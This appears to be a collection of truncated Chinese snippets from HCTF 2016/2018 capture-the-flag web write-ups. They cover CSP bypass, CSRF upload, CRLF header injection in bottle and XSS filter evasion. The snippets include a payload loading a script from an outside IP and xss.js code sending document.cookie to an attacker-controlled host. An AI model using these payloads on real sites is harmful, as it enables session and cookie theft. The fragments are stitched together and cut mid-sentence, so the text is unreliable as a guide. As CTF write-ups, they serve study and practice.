攻击思路:defalt-src是self,1、表示即使拿到cookie也只能在域内传送,所以只能将cookie传回注册用户afanti.user.php存在常规xss但是unsafe-inline不能写入js代码。要是引入js代码,引入的目录在/hctf2016_secret_area/static/这里不可控没法传入js,/hctf2016_secret_area/upload/这个目录我们可控(通过上传头像写入代码),...
hctf.io/static/ 目录是在csp策略里script标签白名单里的,于是在头像文件里写上xss payload,上传后得到http://sguestbook.hctf.io/ /upload/e8ea98429c80cfd74e000cce900612a3。 然后就只需要构造 这个标签即可绕过csp策略。script on 被过滤,也是绕过即可。 level4-web选手的自我 下载docker镜像misc后执行...
在http://share.2018.hctf.io/home/share 中存在一个提交表单,提交一段xss可以看到xss会被执行,但cookie开启了httponly。所以我们可以进行csrf upload来上传文件,之后再通过csrf获取上传后的文件名。 payload 如下: <!-- csrf upload payload --> function submitRequest() { var xhr = new XMLHttpRequest();...
/Alphatest可以看到一个filenumber 和自己的uid /share 可以分享东西给管理员,猜测存在xss,context框传了个段xss代码,发现能接收到admin的请求,bot是PhantomJS/2.1.1,说明能执行js,但是开了httponly打不到cookie,猜测是要CSRF,url框传的东西好像没啥用 根据主页提示可能有源码泄漏,在robots.txt 看到了三个接口的代...
location.href='http://bottle.2018.hctf.io/path?path=http://bottle.2018.hctf.io:22/user%0d%0aX-XSS-Protection:0%0d%0aContent-Length:200%0d%0a%0d%0a%3Cscript%20src%3dhttp://118.24.185.108/c.js?1541913080%3E%3C/script%3E'; hide and seekuser ...
bottle 是一个轻量级的python web框架,题目和名字描述是一样的,采用的是bottle 框架,框架存在漏洞(CVE-2016-9964),HTTP头注入的问题。 path参数为注入点,输出点为响应中的Location,构造Xss的Poc http://bottle.2018.hctf.io/path?path=http://bottle.2018.hctf.io/user/%0a%0d%0a%0dxss 发送给admin,打coo...
并把提交的message的值显示出来,既然说等待管理员的同意嘛,然后又显示我们提交的东西,那么猜测是一个XSS。经过测试,有一些过滤,下面给出绕过方法: 1.会将message中的“img”,“svg”,“script”,“on”删掉 双写绕过就好了(scrscriptipt) 2.“/”换成“_” ...
http://bottle.2018.hctf.io/path?path=http://bottle.2018.hctf.io:22/user%0d%0aContent-Length:49%0d%0a%0d%0a image.png xss.js内容vps.ip是你的vps的ip值 var img = document.createElement("img"); img.src = "http://vps.ip/?cookie=" + encodeURI(document.cookie); document.body.ap...